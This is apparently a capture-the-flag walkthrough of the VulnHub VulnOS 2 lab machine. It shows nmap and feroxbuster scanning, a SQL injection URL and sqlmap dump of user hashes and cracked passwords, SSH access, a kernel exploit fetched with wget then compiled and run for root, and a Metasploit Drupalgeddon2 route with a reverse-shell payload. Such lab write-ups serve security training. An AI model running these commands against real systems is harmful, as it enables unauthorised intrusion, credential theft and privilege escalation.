Machine Link : https://www.vulnhub.com/entry/vulnos-2,147/
STEP1
arp-scan -l -- to get the victim ip
FINDING
192.168.0.102
-------------------------------------------------------------------------------------------------------------
STEP2
nmap -T4 -sSV -p- 192.168.0.102 -Pn -A
FINDING
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open irc ngircd
OS details: Linux 3.2 - 4.9
-------------------------------------------------------------------------------------------------------------
STEP3
open the site on browser with ip and click on "website" in red at bottom
-------------------------------------------------------------------------------------------------------------
STEP4
feroxbuster -u http://192.168.0.104/jabc/
FINDING
192.168.0.104/jabc/modules/blog/blog.info
version = "7.26"
project = "drupal"
http://192.168.0.104/jabc/modules/node/node.test (xxs popup)
-------------------------------------------------------------------------------------------------------------
STEP5
click on Document tab and go to the sourse
FINDING
/jabcd0cs/ at line 142
-------------------------------------------------------------------------------------------------------------
STEP6
dirb http://192.168.0.104/jabcd0cs/
http://192.168.0.104/jabcd0cs/ -- it is a login page
NOTE -- at the bottom of the page
search exploit for "OpenDocMan v1.2.7"
FINDING
https://www.exploit-db.com/exploits/32075
http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 -- sqlcommand injection vulnerability found in the exploit
sqlmap -u http://192.168.0.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user --batch --dbms=mysql --dbs -p add_value -dump
FINDING
+----+--------------------+-------------+------------------------------------------+----------+-----------+------------+------------+---------------+
| id | Email | phone | password | username | last_name | department | first_name | pw_reset_code |
+----+--------------------+-------------+------------------------------------------+----------+-----------+------------+------------+---------------+
| 1 | [email protected] | 5555551212 | b78aae356709f8c31118ea613980954b | webmin | min | 2 | web | blank |
| 2 | [email protected] | 555 5555555 | 084e0343a0486ff05530df6c705c8bb4 (guest) | guest | guest | 2 | guest | NULL |
| 3 | [email protected] | 9999999999 | b438079e6d6db31c2aad9fdf1032e756 | C | A | 1 | B | NULL |
| 4 | [email protected] | 9999999999 | 3b253eadc522d0a2294eb492aba9b28c | U | L | 2 | F | NULL |
| 5 | [email protected] | 123 4567890 | 64cc3db263af674b6b01fae1fc30bc7b | USERNAME | LAST | 2 | FIRST | NULL |
+----+--------------------+-------------+------------------------------------------+----------+-----------+------------+------------+---------------+
webmin-webmin1980 (password)
guest -guest (password)
-------------------------------------------------------------------------------------------------------------
STEP6
ssh [email protected] -p 22 -- with password webmin1980
-------------------------------------------------------------------------------------------------------------
STEP7
python -c import pty; pty.spawn("/bin/bash")
-------------------------------------------------------------------------------------------------------------
STEP8
uname r
FINDING
3.13.0-24-generic
-------------------------------------------------------------------------------------------------------------
STEP9
search kernel exploit 3.13.0-24-generic
FINDING
https://www.exploit-db.com/exploits/37292
-------------------------------------------------------------------------------------------------------------
STEP10
on terminal
cd /tmp
wget https://www.exploit-db.com/download/37292
ls
webmin@VulnOSv2:/tmp$ cp 37292 37292.c
webmin@VulnOSv2:/tmp$ gcc 37292.c -o exploitt.c -pthread
webmin@VulnOSv2:/tmp$ ./exploitt.c
whoami
you will be root
# cd /root
# ls
flag.txt
cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?
=============WITH MSFCONSOLE===============================
STEP5
service postgresql start && msfconsole -- open msfconsole
msf6 search exploit drupal
msf6 use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2)
msf6 exploit(unix/webapp/drupal_drupalgeddon2) set rhosts 192.168.0.104
rhosts = 192.168.0.104
msf6 exploit(unix/webapp/drupal_drupalgeddon2) set targeturi /jabc/
targeturi = /jabc/
msf6 exploit(unix/webapp/drupal_drupalgeddon2) run
-------------------------------------------------------------------------------------------------------------
STEP6
meterpreter shell
-------------------------------------------------------------------------------------------------------------
STEP7
python -c import pty; pty.spawn("/bin/bash")
-------------------------------------------------------------------------------------------------------------
STEP8
uname r
FINDING
3.13.0-24-generic
-------------------------------------------------------------------------------------------------------------
STEP9
search kernel exploit 3.13.0-24-generic
FINDING
https://www.exploit-db.com/exploits/37292
-------------------------------------------------------------------------------------------------------------
STEP10
on terminal
cd /tmp
wget https://www.exploit-db.com/download/37292
ls
webmin@VulnOSv2:/tmp$ cp 37292 37292.c
webmin@VulnOSv2:/tmp$ gcc 37292.c -o exploitt.c -pthread
webmin@VulnOSv2:/tmp$ ./exploitt.c
whoami
you will be root
# cd /root
# ls
flag.txt
cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?
-------------------------------------------------------------------------------------------------------------
|